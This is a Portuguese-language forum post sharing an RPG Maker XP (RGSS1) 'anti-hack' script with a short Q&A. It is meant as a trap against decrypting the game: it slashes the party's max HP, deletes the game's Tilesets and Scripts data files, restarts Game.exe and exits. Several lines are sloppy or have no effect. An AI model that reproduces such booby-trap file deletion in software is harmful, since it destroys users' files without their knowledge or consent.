Anti Hack v1.2
Brasil G4mes :: Scripts :: Scripts RGSS1
Página 1 de 1
Anti Hack v1.2
Então, o tempo passou e eu não parei de aprender RGSS. Minha última criação foi um sistema de cheats, logo disponibilizo aqui xD. Mas, eu editei um script aqui pra defender do desencriptador mais comum utilizado no RPG Maker XP.
O código abaixo:
Créditos:
Roberto Dash(eu)
PedR0
O código abaixo:
- Código:
##################################################################
# Sistema Antihack scene debug #
# Créditos: Roberto Dash(criador)
# PedR0 por mostrar a classe Scene_Zlib
##################################################################
class Scene_Zlib # vem de Z Library
def main
#Pronto para reduzir o HP máximo do personagem
$game_actors[1].maxhp = 10
$game_actors[2].maxhp = 10
$game_actors[3].maxhp = 10
#Deletar os arquivos
for i in 0..3
if FileTest.exist?("Data/Tilesets.rxdata")
File.delete("Data/Tilesets.rxdata" )
FileTest.exist?("Data/Scripts.rxdata")
File.delete("Data/Scripts.rxdata")
$RGSS_SCRIPTS.nil?
Thread.new {system('Game.exe')}
exit
end
end
end
end
P:E, o que essa nova versão faz que a outra non faz?
R:Essa aqui faz um belo dum estrago no jogo. Não deleta o save, mas faz coisa bem pior.
P: Porque deleta o arquivo Scripts.rxdata se o jogo está encriptado?
R: Ele deleta pra que, se o jogo for desencriptado, o arquivo de scripts esteja inacessível. Então, assim, tudo o que o cara fez foi ter trabalho pra depois não ter acesso ao que mais queria. Deletar os scripts também impede que o jogo seja rodado.
Créditos:
Roberto Dash(eu)
PedR0
Brasil G4mes :: Scripts :: Scripts RGSS1
Página 1 de 1
Permissões neste sub-fórum
Não podes responder a tópicos